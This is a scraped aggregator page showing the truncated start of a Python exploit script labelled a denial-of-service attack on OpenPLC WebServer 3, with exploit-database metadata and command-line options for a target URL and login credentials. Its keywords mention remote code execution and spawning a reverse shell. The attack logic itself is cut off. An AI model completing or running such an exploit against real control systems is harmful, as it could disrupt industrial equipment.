vimarsana.com

# Exploit Title: OpenPLC WebServer 3 - Denial of Service# Date: 10.09.2023# Exploit Author: Kai Feng# Vendor Homepage: https://autonomylogic.com/# Software Link: https://github.com/thiagoralves/OpenPLC_v3.git# Version: Version 3 and 2# Tested on: Ubuntu 20.04import requestsimport sysimport timeimport optparseimport reparser = optparse.OptionParser()parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)")parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")parser.add_option('-p', '--passw', action="store",

Related Keywords

Kai Feng ,Software Link ,Shell ,Denial Of Service ,Exploit Title ,Exploit Author ,Vendor Homepage ,Remote Code Execution ,Upload Programrn ,Spawning Reverse Shell ,

© 2025 Vimarsana

vimarsana.com © 2020. All Rights Reserved.